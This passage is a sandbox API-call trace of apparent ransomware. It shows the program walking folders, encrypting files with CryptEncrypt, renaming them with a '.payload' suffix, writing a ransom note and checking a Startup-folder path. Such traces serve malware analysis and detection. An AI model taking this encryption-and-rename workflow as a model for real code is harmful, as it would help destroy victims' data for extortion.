ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1045", cAlternateFileName="")) returned 1 [0059.334] lstrcmpiW (lpString1="1045", lpString2="Windows") returned -1 [0059.334] lstrcmpiW (lpString1="1045", lpString2="$Recycle.bin") returned 1 [0059.334] lstrcmpiW (lpString1="1045", lpString2="System Volume Information") returned -1 [0059.334] lstrcmpiW (lpString1="1045", lpString2="Program Files") returned -1 [0059.334] lstrcmpiW (lpString1="1045", lpString2="Program Files (x86)") returned -1 [0059.334] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045") returned 30 [0059.334] lstrcmpW (lpString1="1045", lpString2=".") returned 1 [0059.334] lstrcmpW (lpString1="1045", lpString2="..") returned 1 [0059.334] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.334] GetProcessHeap () returned 0x5e0000 [0059.334] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.334] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\*") returned 32 [0059.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606360 [0059.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.335] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\.") returned 32 [0059.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.335] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.335] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\..") returned 33 [0059.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.335] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.335] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.335] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.335] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.496] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.496] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.496] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 39 [0059.496] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.496] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.496] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.496] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.496] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.496] GetTickCount () returned 0x114f4f0 [0059.497] GetTickCount () returned 0x114f4f0 [0059.497] GetTickCount () returned 0x114f4f0 [0059.497] GetTickCount () returned 0x114f4f0 [0059.497] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.497] GetProcessHeap () returned 0x5e0000 [0059.497] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.497] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xfc8, lpOverlapped=0x0) returned 1 [0059.498] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff038, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.498] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xfc8, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xfc8, lpOverlapped=0x0) returned 1 [0059.498] GetProcessHeap () returned 0x5e0000 [0059.498] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.498] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.499] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.499] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.499] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.499] CloseHandle (hObject=0x438) returned 1 [0059.500] GetProcessHeap () returned 0x5e0000 [0059.500] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.500] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.503] GetProcessHeap () returned 0x5e0000 [0059.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.503] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.503] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.503] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.503] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.503] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.503] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.503] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 48 [0059.503] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.503] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.503] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.503] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.503] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.503] GetTickCount () returned 0x114f4f0 [0059.503] GetTickCount () returned 0x114f4f0 [0059.503] GetTickCount () returned 0x114f4f0 [0059.503] GetTickCount () returned 0x114f4f0 [0059.503] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.504] GetProcessHeap () returned 0x5e0000 [0059.504] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.504] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.505] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.506] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.506] GetProcessHeap () returned 0x5e0000 [0059.506] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.506] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.506] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.506] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.506] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.506] CloseHandle (hObject=0x438) returned 1 [0059.508] GetProcessHeap () returned 0x5e0000 [0059.508] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.508] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.509] GetProcessHeap () returned 0x5e0000 [0059.509] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.509] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.509] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.509] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.509] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.509] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.509] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.509] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 49 [0059.509] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.509] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.509] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.509] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.509] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.510] GetTickCount () returned 0x114f4f0 [0059.510] GetTickCount () returned 0x114f4f0 [0059.510] GetTickCount () returned 0x114f4f0 [0059.510] GetTickCount () returned 0x114f4f0 [0059.510] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.510] GetProcessHeap () returned 0x5e0000 [0059.510] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.510] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.512] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.512] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.512] GetProcessHeap () returned 0x5e0000 [0059.512] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.512] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.512] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.512] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.512] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.512] CloseHandle (hObject=0x438) returned 1 [0059.514] GetProcessHeap () returned 0x5e0000 [0059.514] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.514] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.514] GetProcessHeap () returned 0x5e0000 [0059.514] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.514] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.514] FindClose (in: hFindFile=0x606360 | out: hFindFile=0x606360) returned 1 [0059.514] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.514] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1045\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.514] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.516] CloseHandle (hObject=0x430) returned 1 [0059.516] GetProcessHeap () returned 0x5e0000 [0059.516] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.516] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1046", cAlternateFileName="")) returned 1 [0059.516] lstrcmpiW (lpString1="1046", lpString2="Windows") returned -1 [0059.516] lstrcmpiW (lpString1="1046", lpString2="$Recycle.bin") returned 1 [0059.516] lstrcmpiW (lpString1="1046", lpString2="System Volume Information") returned -1 [0059.516] lstrcmpiW (lpString1="1046", lpString2="Program Files") returned -1 [0059.516] lstrcmpiW (lpString1="1046", lpString2="Program Files (x86)") returned -1 [0059.516] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046") returned 30 [0059.516] lstrcmpW (lpString1="1046", lpString2=".") returned 1 [0059.516] lstrcmpW (lpString1="1046", lpString2="..") returned 1 [0059.516] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.516] GetProcessHeap () returned 0x5e0000 [0059.516] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.516] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\*") returned 32 [0059.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6066e0 [0059.517] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.517] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.517] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.517] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.517] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.517] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\.") returned 32 [0059.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.517] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.517] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.517] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.517] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.517] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.517] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.517] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\..") returned 33 [0059.517] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.517] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.517] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.518] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.518] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.518] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.518] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.518] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 39 [0059.518] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.518] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.518] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.518] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf", 